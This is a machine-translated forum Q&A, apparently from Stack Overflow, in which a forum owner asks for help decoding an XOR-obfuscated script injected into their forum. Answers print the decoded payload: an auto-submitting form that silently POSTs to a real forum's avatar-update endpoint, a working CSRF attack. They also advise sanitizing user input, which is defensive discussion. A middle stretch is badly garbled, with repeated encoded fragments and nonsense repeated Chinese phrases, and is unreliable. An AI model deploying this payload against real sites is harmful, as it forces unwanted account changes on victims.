Javascript编码？

有人用一个奇怪的脚本来窃听我的论坛，我跟踪了它并找到了javascript，但它是“编码的”，有人能帮我吗

这是：

<script language="javascript">
var enkripsi="'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1@'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5@'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
</script>

“1”0；1“0”1“0”1“0”1“1”2“1”2“1”2“1”2“1”2“1”2“1”2“1”2“1”2“1”2“1”2“2”2“1”2“1”2“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“5“1”5“1”5“5“1”5“1”5“1”5“1”5“1”5“1”5“1”5“5“1”5“1”5“1”5“1”5“5“1”5“1”5“1”5“1”5“1”5“1”5“1”'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v'当时的研究者们认为这是一个1F（当时的研究者们当时的研究者当时当时的一个当时的一个当时的研究者当时的一个当时的研究者当时的一个当时的研究者当时当时的一个当时的研究者当时的一个研究者当时的一个当时的一个研究者当时的一个当时的一个研究者当时当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时的一个研究者当时当时的一个1 1 1 1 1 1个1个1个1个1个1个1个1个1号1号1个1号1个1个1个1个1个1个1个1个1个研究者当时的研究1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72；'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'02tcnwg'1F'00vpwg'00'1G'2C'02'02RNGCG'02ankai'02JGGG'02'02'1Aklrwv'02v'02v当时的一些人认为，当时的一些人对当时的一些人来说，当时的一些人对当时的一些人来说，当时的一些人对当时的一些人来说，当时的02-2-'1G'1G'1G-1A-1G-1G-1F-1F-1F-1F-1F-1F-1F-1F-1-1-1A-1A-1C-1A-1A-1A-1A-1A-1-dmpo-1C-1A-1A-1A-1A-1-1-1A-1-1-1A-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1A-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1A-qapkrv'1G“teks=”；teksasli=”；变量panjang；panjang=enkripsi.长度；用于（i=0；i清除代码会导致

var enkripsi = "'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1@'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5@'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G";
teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++) {
    teks += String.fromCharCode(enkripsi.charCodeAt(i) ^ 2)
}
teksasli = unescape(teks);
document.write(teksasli);

这里真正的问题是用户是如何将代码注入到您的站点中的。他们是将代码输入到表单中，而您只是输出他们输入的内容，还是您使用的软件中存在缺陷

如果是软件中的错误，则升级

如果是您的代码，您需要学习如何清理用户输入。
以下是未经过滤的JavaScript代码：

<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
  <input type="hidden" name="callCount" value="1"> 
  <input type="hidden" name="c0-scriptName" value="UserFunctions">
  <input type="hidden" name="c0-methodName" value="updateUserAvatar">
  <input type="hidden" name="c0-id" value="5877_1317262737173">
  <input type="hidden" name="c0-param0" value="string:5099">
  <input type="hidden" name="xml" value="true">
  Please click here: <input type="submit" value="Continue..." /></p>
</form>

<script language="javascript">
  <!--
  function submit_form() 
  {
    document.myform.submit()
  }
  -->
</script>


请按此处：

帮助解码？据我所知，解包或“解码”逻辑是明确的，您只需反向操作即可。我认为您仍可能在另一端得到缩小/模糊的javascript，但谁知道呢。有没有办法防止用户将
标记注入论坛帖子（或者无论他们在哪里发布）？这才是你真正的问题。我的论坛是安全的，用户必须点击带有脚本的链接才能受到影响，这很烦人，因为人们使用youtube视频链接用url代码将其隐藏起来。实际上这并不安全。如果用户可以注入此内容，他们可能会注入恶意软件和其他东西。名称为“enkripsi”有点乐观；）@Dave Newton，这并不乐观，它是加密的。加密并不意味着它不能被读取，它只是意味着它需要特殊的知识才能理解。在这种情况下，特殊的知识是JavaScript。谢谢，但还有更多的是在代码上，用户改变了他们的头像并发布了一些东西。这种编码很弱，我希望有一些更难破解的东西。：@Dave，当我看到enkripsi时，我真的笑了。@Paulo，看看它是什么。它是一个用JavaScript提交的表单，执行
updateUserAvatar
。不要在论坛中使用HTML。
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
  <input type="hidden" name="callCount" value="1"> 
  <input type="hidden" name="c0-scriptName" value="UserFunctions">
  <input type="hidden" name="c0-methodName" value="updateUserAvatar">
  <input type="hidden" name="c0-id" value="5877_1317262737173">
  <input type="hidden" name="c0-param0" value="string:5099">
  <input type="hidden" name="xml" value="true">
  Please click here: <input type="submit" value="Continue..." /></p>
</form>

<script language="javascript">
  <!--
  function submit_form() 
  {
    document.myform.submit()
  }
  -->
</script>